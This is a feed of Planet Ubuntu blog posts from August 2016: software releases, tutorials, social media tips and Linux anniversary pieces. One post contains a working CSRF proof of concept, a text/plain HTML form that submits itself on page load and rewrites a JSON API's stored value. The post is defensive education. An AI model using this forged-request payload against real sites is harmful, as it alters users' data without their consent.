Most recent items from Ubuntu feeds:
Aurélien Gâteau: Qt 5 based Colorpick from Planet Ubuntu

Colorpick is one of my little side-projects. It is a tool to select colors. It comes with a screen color picker and the ability to check two colors contrast well enough to be used as foreground and background colors of a text.

Three instances of Colorpick showing how the background color can be adjusted to reach a readable text.

The color picker in action. The cursor can be moved using either the mouse or the arrow keys.
I wrote this tool a few years ago, using Python 2, PyQt 4 and PyKDE 4. It was time for an update. I started by porting it to Python 3, only to find out that apparently there are no Python bindings for KDE Frameworks...
Colorpick uses a few kdelibs widgets, and some color utilities. I could probably have rewrote those in PyQt 5, but I was looking for a pretext to have a C++ based side-project again, so instead I rewrote it in C++, using Qt5 and a couple of KF5 libraries. The code base is small and PyQt code is often very similar to C++ Qt code so it only took a few 45 mn train commutes to get it ported.
If you are a Colorpick user and were sad to see it still using Qt 4, or if you are looking for a color picker, give it a try!

about 13 hours ago

Robert Ancell: Introducing snapd-glib from Planet Ubuntu

World, meet snapd-glib. It's a new library that makes it easy for GLib based projects (e.g. software centres) to access the daemon that allows you to query, install and remove Snaps. If C is not for you, you can use all the functionality in Python (using GObject Introspection) and Vala. In the future it will support Qt/QML through a wrapper library.snapd uses a REST API and snapd-glib very closely matches that. The behaviour is best understood by reading the documentation of that API. To give you a taste of how it works, here's an example that shows how to find and install the VLC snap.Step 1: Connecting to snapdThe connection to snapd is controlled through the SnapdClient object. This object has all the methods required to communicate with snapd. Create and connect with:    g_autoptr(SnapdClient) c = snapd_client_new ();    if (!snapd_client_connect_sync (c, NULL, &error))        // Something went wrongStep 2: Find the VLC snap Asking snapd to perform a find causes it to contact the remote Snap store. This can take some time so consider using an asynchronous call for this. This is the synchronous version:    g_autoptr(GPtrArray) snaps =        snapd_client_find_sync (c,                                SNAPD_FIND_FLAGS_NONE, "vlc",                                NULL, NULL, &error);    if (snaps == NULL)        // Something went wrong    for (int i = 0; i < snaps->len; i++) {        SnapdSnap *snap = snaps->pdata[i];        // Do something with this snap information    }Step 3: Authenticate Some methods require authorisation in the form of a Macaroon (the link is quite complex but in practise it's just a couple of strings). To get a Macaroon you need to provide credentials to snapd. In Ubuntu this is your Ubuntu account, but different snapd installations may use another authentication provider.Convert credentials to authorization with:     g_autoptr(SnapdAuthData) auth_data =        snapd_client_login_sync (c,                                 email, password, code,                                 NULL, &error);    if (auth_data == NULL)        return EXIT_FAILURE;Once you have a Macaroon you can store it somewhere and re-use it next time you need it. Then the authorization can be created with:    g_autoptr(SnapdAuthData) auth_data =        snapd_auth_data_new (macaroon, discharges);    snapd_client_set_auth_data (c, auth_data); Step 4: Install VLC In step 2 we could determine the VLC snap has the name "vlc". Since this involves downloading ~100Mb and is going to take some time the asynchronous method is used. There is a callback that gives updates on the progress of the install and one that is called when the operation completes:      snapd_client_install_async (c,                                "vlc", NULL,                                progress_cb, NULL,                                NULL,                                install_cb, NULL);static voidprogress_cb (SnapdClient *client,             SnapdTask *main_task, GPtrArray *tasks,             gpointer user_data){    // Tell the user what's happening }static voidinstall_cb (GObject *object, GAsyncResult *result,            gpointer user_data){    g_autoptr(GError) error = NULL;    if (snapd_client_install_finish (SNAPD_CLIENT (object),                                     result, &error))        // It installed!    else        // Something went wrong...}Conclusion With snapd-glib and the above code as a starting point you should be able to start integrating Snap support into your project. Have fun!

1 day ago

Lubuntu Blog: Lubuntu Yakkety Yak Beta 1 has been released! from Planet Ubuntu

Lubuntu Yakkety Yak Beta 1 (soon to be 16.10) has been released! We have a couple papercuts listed in the release notes, so please take a look. A big thanks to the whole Lubuntu team and contributors for helping pull this release together. You can grab the images from here: http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/

1 day ago

The Fridge: Yakkety Yak Beta 1 Released from Planet Ubuntu

The Jogpa, in our mad flight, cut off a long lock of the yak’s silky hair. Having secured this, he appeared to be quite satisfied, let go, and sheathed his sword.
– Arnold Henry Savage Landor
The first beta of the Yakkety Yak (to become 16.10) has now been released!
This milestone features images for Lubuntu, Ubuntu GNOME, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio.
Pre-releases of the Yakkety Yak are not encouraged for anyone needing a stable system or anyone who is not comfortable running into occasional, even frequent breakage. They are, however, recommended for Ubuntu flavor developers and those who want to help in testing, reporting and fixing bugs as we work towards getting this bos grunniens ready.
Beta 1 includes a number of software updates that are ready for wider testing. These images are still under development, so you should expect some bugs.
While these Beta 1 images have been tested and work, except as noted in the release notes, Ubuntu developers are continuing to improve the Yakkety Yak. In particular, once newer daily images are available, system installation bugs identified in the Beta 1 installer should be verified against the current daily image before being reported in Launchpad. Using an obsolete image to re-report bugs that have already been fixed wastes your time and the time of developers who are busy trying to make 16.10 the best Ubuntu release yet. Always ensure your system is up to date before reporting bugs.
Lubuntu
Lubuntu is a flavor of Ubuntu based on LXDE and focused on providing a very lightweight distribution.
The Lubuntu 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/

More information about Lubuntu 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/Lubuntu

Ubuntu GNOME
Ubuntu GNOME is a flavour of Ubuntu featuring the GNOME desktop environment.
The Ubuntu GNOME 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntu-gnome/releases/yakkety/beta-1/

More information about Ubuntu GNOME 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuGNOME

Ubuntu Kylin
Ubuntu Kylin is a flavour of Ubuntu that is more suitable for Chinese users. The Ubuntu Kylin 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntukylin/releases/yakkety/beta-1/

More information about Ubuntu Kylin 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuKylin

Ubuntu MATE
Ubuntu MATE is a flavour of Ubuntu featuring the MATE desktop environment for people who just want to get stuff done. The Ubuntu MATE 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntu-mate/releases/yakkety/beta-1/

More information about Ubuntu MATE 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuMATE

Ubuntu Studio
Ubuntu Studio is a flavour of Ubuntu configured for multimedia production. The Ubuntu Studio 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntustudio/releases/yakkety/beta-1/

More information about Ubuntu Studio 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuStudio

If you’re interested in following the changes as we further develop the Yakkety Yak, we suggest that you subscribe to the ubuntu-devel-announce list. This is a low-traffic list (a few posts a month) carrying announcements of approved specifications, policy changes, beta releases and other interesting events.
http://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-announce
A big thank you to the developers and testers for their efforts to pull together this Beta release!
In addition, we would like to wish Linux a happy 25th birthday!
Originally posted to the ubuntu-release mailing list on Thu Aug 25 22:14:28 UTC 2016 by Set Hallstrom and Simon Quigley on behalf of the Ubuntu Release Team

1 day ago

Alessio Treglia: The Breath of Time from Planet Ubuntu

Tweet
 
For centuries man has hunted, he brought the animals to pasture, cultivated fields and sailed the seas without any kind of tool to measure time. Back then, the time was not measured, but only estimated with vague approximation and its pace was enough to dictate the steps of the day and the life of man. Subsequently, for many centuries, hourglasses accompanied the civilization with the slow flow of their sand grains. About hourglasses, Ernst Junger writes in “Das Sanduhrbuch – 1954” (no English translation): “This small mountain, formed by all the moments lost that fell on each other, it could be understood as a comforting sign that the time disappears but does not fade. It grows in depth”.
For the philosophers of ancient Greece, the time was just a way to measure how things move in everyday life and in any case there was a clear distinction between “quantitative” time (Kronos) and “qualitative” time (Kairòs). According to Parmenides, time is guise, because its existence…
<Read More…[by Fabio Marzocca]>

Tweet

1 day ago

Jonathan Riddell: KDevelop, Muon, Plasma 5.7.4 from Planet Ubuntu

To celebrate the release of KDevelop 5 we’ve added KDevelop 5 to KDE neon User Edition.  Git Stable and Git Unstable builds are also in the relevant Developer Editions.
But wait.. that’s not all.. the package manager Muon seem to have a new maintainer so to celebrate we added builds in User Edition and Git Unstable Developer Edition.
Plasma 5.7.4 has been out for some time now so it’s well past time to get it into Neon, delayed by a move in infrastructure which caused the entire repository to rebuild.  All Plasma packages should be updated now in KDE neon User Edition.
Want to install it? The weekly User Edition ISO has been updated and looks lovely.

by

1 day ago

Jono Bacon: Social Media: 10 Ways To Not Screw It Up from Planet Ubuntu

Social media is everywhere. Millions of users, seemingly almost as many networks, and many agencies touting that they have mastered the zen-like secrets to social media and can bring incredible traction.

While social media has had undeniable benefits to many, it has also been contorted and twisted in awkward ways. For every elegant, well deliver social account there are countless blatant attention-grabbing efforts.

While I am by no means a social media expert, over the years I have picked up some techniques and approaches that I have found useful with the communities, companies, and clients I have worked with. My goal has always been to strike a good balance between quality, engagement, and humility.

I haven’t always succeeded, but here are 10 things I recommend you do if you want to do social media well:

1. Focus on Your Core Networks

There are loads of social media networks out there. For some organizations there is an inherent temptation to grow an audience on all of them. More audiences mean more people, right?

Well, not really.

As with most things in life, it is better to have focus and deliver quality than to spread yourself too thin. So, pick a few core networks and focus on them. Focus on delivering great content, growing your audience, and engaging well.

My personal recommendations are to focus n Twitter and Facebook for sure, as they have significant traction, but also Instagram and Google+ are good targets too. It is really up to you though for what works best for your organization/goals.

2. Configure Your Accounts Well

Every social media network has some options for choosing an avatar, banner, and adding a little text. It is important to get this right.

Put yourself in the position of your audience. Imagine they don’t know who you are and they stumble on your profile. Sure, a picture of a care bear and a quote from The Big Lebowski may look cool, but it doesn’t help the reader.

Their reading of this content is going to result in a judgement call about you. So, reflect yourself accurately. Want to be a professional? Look and write professionally. Want to be a movie fan who believes in magical bears? Well, erm, I guess you know what to do.

It is also important to do this for SEO (Search Engine Optimization). If you want more Google juice for your name/organization, be sure to incorporate it in your profiles and content.

3. Quality vs. Quantity

A while back I spent a bit of time working with some folks who were really into social media. They had all kinds of theories about how the Facebook and Twitter algorithms prioritize content, hide it from users, and only display certain types of content to others. Of course this is not an exact science as these algorithms are typically confidential to those networks.

There is no doubt that social networks have to make some kind of judgement on what to show – there is just too much material to show it all. So, we want to be mindful of these restrictions, but also be wary that a lot of this is guessing.

The trick here is simple: focus on delivering high quality content and just don’t overdo it. Posting 50 tweets in a day is not going to help – it will be too much and probably not high quality (likely due to the quantity). Even if your audience sees it all, it will just seem spammy.

Now, you may be asking what high quality content would look like? Fundamentally I see it as understanding your audience, how they communicate, and mirroring those interests and tonality. Some examples:

Well written content that is concise, loose, and fun.
Interesting thoughts, ideas, and discussions.
Links to interesting articles, data, and other material.
Interesting embedded pictures, videos, and other content.

Speaking of embedding…

4. Embed Smartly

All the networks allow you to embed pictures and videos in your social posts.

Where possible, always embed something. It typically results in higher performing posts both in terms of views and click-rate.

Video has proven to do very well on social media networks. People are naturally curious and click the video to see it. Be mindful here though – posting a 45 minute documentary isn’t going to work well. A 2 minute clip will work great though.

Also, check how different networks display videos. For example, on Twitter and Google+, YouTube videos get a decent sized thumbnail and are simple to play. On Facebook though, YouTube videos are noticeably smaller (likely because Facebook doesn’t want people embedding YouTube videos). So, when posting on Facebook, uploading a native video might be best.

Pictures are an interesting one. A few tips:

Square pictures work especially well. They resize well in most social interfaces to take up the maximum amount of space.
The ideal size is 505×505 pixels on Facebook. I have found this size to work well on other networks too.
Images that work particularly well are high contrast and have large letters. They stand out more in a feed and make people want to click them. An example of an image I am using for my Reddit AMA next week:

Authenticity is essential in any human communication. As humans we are constantly advertised to, sold, and marketed at, and thus evolution has increasingly expanded our bullshit radar.

This radar gets triggered when we see inauthentic content. Examples of this include content trying to be overly peppy, material that requires too many commitments (e.g. registrations), or clickbait. A classic example from our friends at Microsoft:

Social media is fundamentally about sharing and discussion and representing content and tonality that matches your audience. Make sure that you do both authentically.

Share openly, and discuss openly. Act and talk like a human, not a business book, don’t try to be someone you are not, and you will find your audience enjoys your content and finds your efforts rewarding.

6. Connect and Schedule Your Content

Managing all these social media networks is a pain. Of course, there are many tools that you can use for extensive analytics, content delivery, and team collaboration. While these are handy for professional social media people, for many people they are not particularly necessary.

What I do recommend for everyone though is Buffer.

The idea is simple. Buffer lets you fill a giant bucket full of social media posts that will hit the major networks such as Twitter, Facebook, Google+ (pages), and Instagram. You then set a schedule for when these posts should go out and Buffer will take care of sending them for you at an optimal chosen time.

Part of the reason I love this is that if you have a busy week and forget to post on social media, you know that you are always sharing content. Speaking personally, I often line up my posts on a Sunday night and then periodically post during the week.

Speaking of optimal times…

7. Timing Is Everything

If you want your content to get a decent number of views and clicks, there are definitely better times than others to post.

Much of this depends on your audience and where you are geographically. As an example, while I have a fairly global audience for my work, a significant number of people are based in US. As such, I have found that the best time for my content is in the morning between 8am and 9am Pacific. This then still hits Europe and out towards India.

To figure out the best time for you, post some social posts and look at the analytics to see which times work best. Each social network has analytics available and Buffer provides a nice analytics view too, although the nicer stats require a professional plan.

Knowing what is the best time to post combined with the scheduled posting capabilities of Buffer is a great combo.

8. Deliver Structured Campaigns

You might also want to explore some structured campaigns for your social media efforts. These are essentially themed campaigns designed to get people interested or involved.

A few examples:

Twitter Chats – here you simply choose a hashtag and some guests, announce the chat, and then invite your guests to answer the questions via Twitter and for the audience to respond. They can be rather fun.
Calls For Action – again, choose a hashtag, and ask your audience for feedback to certain questions. This could be questions, suggestions, content, and more.
Thematic Content – here you post a series of posts with similar images or videos attached.

You are only limited by your imagination, but remember, be authentic. Social media is riddled with cheesy last-breath attempts at engagement. Don’t be one of those people.

9. Don’t Take Yourself too Seriously

There has much various studies to suggest social media encourages narcissism. There is certainly observational evidence that backs this up.

You should be proud of your work, proud of your projects, and focus on doing great things. Always try to ensure that you are down to earth though, and demonstrate a grounded demeanor in your posts. No one likes ego, and it is more tempting than ever to use social media as a platform for a confidence boost and increasingly post ego-drive narcissistic content.

Let’s be honest, we have all made this mistake from time to time. I know I have. We are human beings, after all.

As I mentioned earlier, you always want to try to match your tonality to your audience. For some global audiences though it can be tempting to err on the side of caution and be a little too buttoned up. This often ends up being just boring. Be professional, sure, but surprise your audience in your humanity, your humility, and that there is a real person behind the tweet or post.

10. What Not To Do

Social media can be a lot of fun and with some simple steps (such as these) you can perform some successful and rewarding work. There are a few things I would recommend you don’t do though:

Unless you want to be a professional provocateur, avoid deliberately fighting with your audience. You will almost certainly disagree with many of your followers on some political stances – picking fights won’t get you anywhere.
Don’t go and follow everyone for the purposes of getting followed back. When I see that Joe Bloggs has 5,434 followers and is following 5,654 people, it smacks of this behavior.
Don’t be overtly crass. I know some folks online, and even worked with some people, who just can’t help dropping F bombs, crass jokes, and more online. Be fun, be a little edgy, but keep it classy, people.

So, that’s it. Just a few little tips and tricks I have learned over the years. I hope some of this helps. If you found it handy, click those social buttons on the side and practice what you preach and share this post.

I would love to learn from you though. What approaches, methods, and techniques have you found for doing social media better? Share your ideas in the comment box and let’s have a discussion…
The post Social Media: 10 Ways To Not Screw It Up appeared first on Jono Bacon.

1 day ago

Ubuntu Insights: 25 Linux devices to celebrate 25 years of Linux! from Planet Ubuntu

Happy 25th birthday Linux. It’s a monumental milestone!
Over the years Canonical has been working on putting Linux in the hands of millions of people and worked with various hardware vendors to release over 1000 models of Linux hardware (!)
Today we’re celebrating by showcasing 25 Ubuntu devices released over the years from laptop, netbook, tower computer, phone, tablets, development boards, drones to robotic spiders. We hope you enjoy the list – there are some golden oldies – and we look forward to the next 25 years!
Plus if you have a favourite device from the list (or not), why not let us know by tweeting #UbuntuDevices – enjoy!
25 Ubuntu Devices

1. System 76 (June 2005) System76 was the first hardware vendor to offer packaged Ubuntu laptops, desktops and servers!

2. Dell Inspiron Mini 9 (Sep 2008) The Dell Inspiron Mini Series was a line of subnotebook/netbook computers designed by Dell

3. ZaReason Verix 545 (Jun 2010) ZaReason only makes Linux computers

4. HP mini 5103 (Sep 2010) Another netbook!

5. Hp compaq 4000 (Jan 2011) A stable and reliable PC mainly for business use

6. Dell Wyse T50 (Sep 2011) Fast and affordable thin client for Cloud Client Computing Deployments

7. Asus Eee PC 1015CX – (March 2012) Netbooks are still in favour… getting smaller and cheaper!

8. Acer Veriton Z (Jan 2013) One of the many towers running Ubuntu

9. Turtlebot 2 (March 2013) The 2nd iteration of the robotic development platform

10. BQ E4.5 (Feb 2015) And here it is – our very first Ubuntu Phone!

11. Raspberry Pi 2 (Feb 2015) A collaboration with the Raspberry Pi Foundation where Snappy Ubuntu Core is available for the Raspberry Pi 2

12. Meizu MX4 (July 2015) Our first release with Chinese partners, Meizu

13. Lenovo Thinkpad L450 (July 2015) Continually shipping Ubuntu pre-installed on laptops worldwide

14. Intel Compute Stick (July 2015) Enabling the transformation of a display into a fully functioning computer for home use or digital signage!

15. Erle Spider (Sep 2015) The first legged drone powered by ROS and running snappy Ubuntu Core

16. Dell XPS 15 (October 2015) The second iteration of this laptop built for developers who need powerful Linux desktop!

17. Robotics OP2 (Oct 2015) All we can say is, he was a hit at MWC 16!

18. DJI Manifold (Nov 2015) A high-performance embedded computer designed specifically to fly

19. BQ Aquaris M10 (Feb 2016) Reinventing the personal mobile computing experience with our first converged device

20. Meizu PRO 5 (Feb 2016) Our most powerful phone to date!

21. Intel NUC (Feb 2016) A platform for developers to test and create x86-based IOT solutions using snappy Ubuntu Core also used for digital signage solutions

22. Samsung Artik 5+10 (May 2016) Developer images available on 2x boards!

23. Bubblegum 96 board (July 2016) Image of Ubuntu Core available for uCRobotics on this awesome board

24. Mycroft (July 2016) The open source answer to natural language platform

25. Intel Joule board (Aug 2016) A new development board in the Ubuntu family, targetting IoT and robotics makers

Want to find out how to develop for all these great devices? Develop with Ubuntu

1 day ago

Ubuntu Podcast from the UK LoCo: S09E26 – Mosaic Promise - Ubuntu Podcast from Planet Ubuntu

It’s Episode Twenty-six of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!
In this week’s show:

We discuss how we each discovered the Web, in honour of it being 25 years since the first website went online.

We also discuss switching to the Ubuntu Phone full-time, creating an Ubuntu Podcast Roku Channel, and fixing things with Sugru.

We share a Command Line Lurve:

systemd-analyze blame which shows you what’s eating time during startup.
systemd-analyze plot > foo.html which generates a chart.

And we go over all your amazing feedback – thanks for sending it – please keep sending it!

Michael Tunnel from TuxDigital made a video explaining the new ‘apt’.

This weeks cover image is taken from Pixabay.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Join us on IRC in #ubuntu-podcast on Freenode

2 days ago

Ubuntu Insights: 25 years on and Linux is still going strong from Planet Ubuntu

I embarked on the Linux journey in 2004 when I joined the newly founded Canonical and its not-yet-named Ubuntu team. I knew there was incredible opportunity around Linux but even then it wasn’t clear how pervasive Linux would become in all corners of technology, industry and society. Linux started its journey as a platform for researchers and developers and over the last 25 years it has become the innovator’s production platform across all computing platforms we use today. Perhaps it is fairer to say that the world has become developer-led, and since Linux is the first choice of developers, the world has adopted Linux by default. Servers, mobile, IoT and more all primarily run on Linux because the developers who make the most interesting things generally start on Linux.
Canonical is proud to support Linux with Ubuntu as the developer platform of choice. Enabling developers to be agile and effective is the best way to encourage the next wave of technical innovation. The leaders in drones, robotics, blockchain, artificial intelligence, self driving cars, computer visions are all blazing their trail on Ubuntu today and they are the technologies that will shape our lives in the coming years. Canonical shapes Ubuntu to be the fastest, easiest and most economical way to deliver innovation in real products – from the cloud to the edge of the network.
We’re also incredibly proud to continue to support Linux’s journey as the production platform for the enterprise and telecoms infrastructure we see today. Ubuntu is used in more than 55% of the production OpenStack clouds around the world. Enterprise and Telco deployments on Ubuntu have changed the way business deploys IT infrastructure. And we are already leading on what’s next for the future of cloud computing with NFV, Containerisation, and Machine Learning. On the IoT front we’re reshaping the nature of the device and the software operations experience for distributed computing with Ubuntu Core, built for IoT deployments where transactional upgrades, constrained environments, and security are the primary requirements.
While the cloud runs almost entirely on Linux, we think the desktop remains an important focus for Linux innovation too. Ubuntu started from the desktop, and is still innovating with the creation of a unique experience that converges the mobile and desktop worlds. Containers of all forms – docker, LXD and snap packaging are a new way for developers to design, distribute and run applications across clouds, devices and distributions.
So what does the next 25 years look like? As they say, the future is already here, just not evenly distributed. With machine learning progress going exponential, I think societies in future can expect to put even more trust in software for their everyday needs, and I’m glad that the trend is increasingly in favour of software that is shared, that is free for all to build upon, and that can be examined and improved by anybody. Public benefit depends on private innovation, and the fact that Linux as an open platform exists enables that innovation to come from anywhere. That’s something to celebrate. Happy birthday, Linux!

2 days ago

Sebastian Kügler: Multiscreen in Plasma: Improved tools and debugging from Planet Ubuntu

Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.
Multi-screen support means that connecting more than one screen to your computer. The following use cases give good examples of the scope:

Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
Projector The computer is connected to a projector or TV.

The idea is that the user plugs in or starts up with that configuration, if the user has already configured this hardware combination, this setup is restored. Otherwise, a reasonable guess is done to put the user to a good starting point to fine-tune the setup.

This is the job of KScreen. At a technical level, kscreen consists of three parts:

system settings module This can be reached through system settings
kscreen daemon Run in a background process, this component saves, restores and creates initial screen configurations.
libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others that allow to talk to the exact same programming interface, independent of the display server in use.

At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.
So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending, waking up with different configurations, the laptop’s lid may be closed or opened (and when that’s done, we don’t even get an event that it closed, displays come and go, depending on their connection, the same piece of hardware might support completely different resolutions, hardware comes with broken EDID information, display connectors come and go, so do display controllers (crtcs); and on top of all that: the only way we get to know what actually works in reality for the user is the “throw stuff against the wall and observe what sticks” tactic.
This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)
So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled or positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.

Better tools
Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon. We also need to figure out what happens exactly, and when it does. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to figure out what exactly goes on across log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.
A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper tool that can give system information useful for debugging. Perhaps more importantly I know I’d be missing a command-line tool to futz around with screen configurations from the command-line or from scripts as Wayland arrives. kscreen-doctor allows to change the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable
Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0

Please note that kscreen-doctor is quite experimental. It’s a tool that allows to shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eat your hamster.
Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of tricks allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there, I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and working in the future.

3 days ago

David Tomaschik: Posting JSON with an HTML Form from Planet Ubuntu

A coworker and I were looking at an application today that, like so many other
modern web applications, offers a RESTful API with JSON being used for
serialization of requests/responses. She noted that the application didn’t
include any sort of CSRF token and didn’t seem to use any of the headers
(X-Requested-With, Referer, Origin, etc.) as a “poor man’s CSRF token”, but
since it was posting JSON, was it really vulnerable to CSRF? Yes, yes,
definitely yes!

The idea that the use of a particular encoding is a security boundary is, at
worst, a completely wrong notion of security, and at best, a stopgap until W3C,
browser vendors, or a clever attacker gets hold of your API. Let’s examine JSON
encoding as a protection against CSRF and demonstrate a mini-PoC.

The Application

We have a basic application written in Go. Authentication checking is elided
for post size, but this is not just an unauthenticated endpoint.

package main

import (
"encoding/json"
"fmt"
"net/http"
)

type Secrets struct {
Secret int
}

var storage Secrets

func handler(w http.ResponseWriter, r *http.Request) {
if r.Method == "POST" {
json.NewDecoder(r.Body).Decode(&storage)
}
fmt.Fprintf(w, "The secret is %d", storage.Secret)
}

func main() {
http.HandleFunc("/", handler)
http.ListenAndServe(":8080", nil)
}

As you can see, it basically serves a secret number that can be updated via
HTTP POST of a JSON object. If we attempt a URL-encoded or multipart POST, the
JSON decoding fails miserably and the secret remains unchanged. We must POST
JSON in order to get the secret value changed.

Exploring Options

So let’s explore our options here. The site can locally use AJAX via the
XMLHTTPRequest API, but due to the Same-Origin
Policy,
an attacker’s site cannot use this. For most CSRF, the way to get around this
is plain HTML forms, since form submission is not subject to the Same-Origin
Policy. The W3C had a draft specification for JSON
forms, but that has been abandoned
since late 2015, and isn’t supported in any browsers. There are probably some
techniques that can make use of Flash or other browser plugins (aren’t there
always?) but it can even be done with basic forms, it just takes a little work.

JSON in Forms

Normally, if we try to POST JSON as, say, a form value, it ends up being URL encoded,
not to mention including the field name.

<form method='POST'>
<input name='json' value='{"foo": "bar"}'>
<input type='submit'>
</form>

Results in a POST body of:

json=%7B%22foo%22%3A+%22bar%22%7D

Good luck decoding that as JSON!

Doing it as the form field name doesn’t get any better.

%7B%22foo%22%3A+%22bar%22%7D=value

It turns out you can set the enctype of your form to text/plain and avoid the
URL encoding on the form data. At this point, you’ll get something like:

json={"foo": "bar"}

Unfortunately, we still have to contend with the form field name and the
separator (=). This is a simple matter of splitting our payload across both
the field name and value, and sticking the equals sign in an unused field. (Or
you can use it as part of your payload if you need one.)

Putting it All Together

<body onload='document.forms[0].submit()'>
<form method='POST' enctype='text/plain'>
<input name='{"secret": 1337, "trash": "' value='"}'>
</form>
</body>

This results in a request body of:

{"secret": 1337, "trash": "="}

This parses just fine and updates our secret!

3 days ago

Aaron Honeycutt: Razer Hardware on Linux from Planet Ubuntu

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link . It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on github to make it work on Ubuntu/Linux Mint, Debian and a few others maybe since the source is available here: source link
Here is what the application looks like:

It even has a tray applet to change the colors, and effects quickly.

3 days ago

Jono Bacon: Bacon Roundup – 23rd August 2016 from Planet Ubuntu

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
Recently I have been working with HackerOne and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
Recently I have also been working with data.world who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation in which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor
(jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can though, be a little complicated to figure out for attendees. Here’s some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

4 days ago

Elizabeth K. Joseph: Ubuntu in Philadelphia from Planet Ubuntu

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.
But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

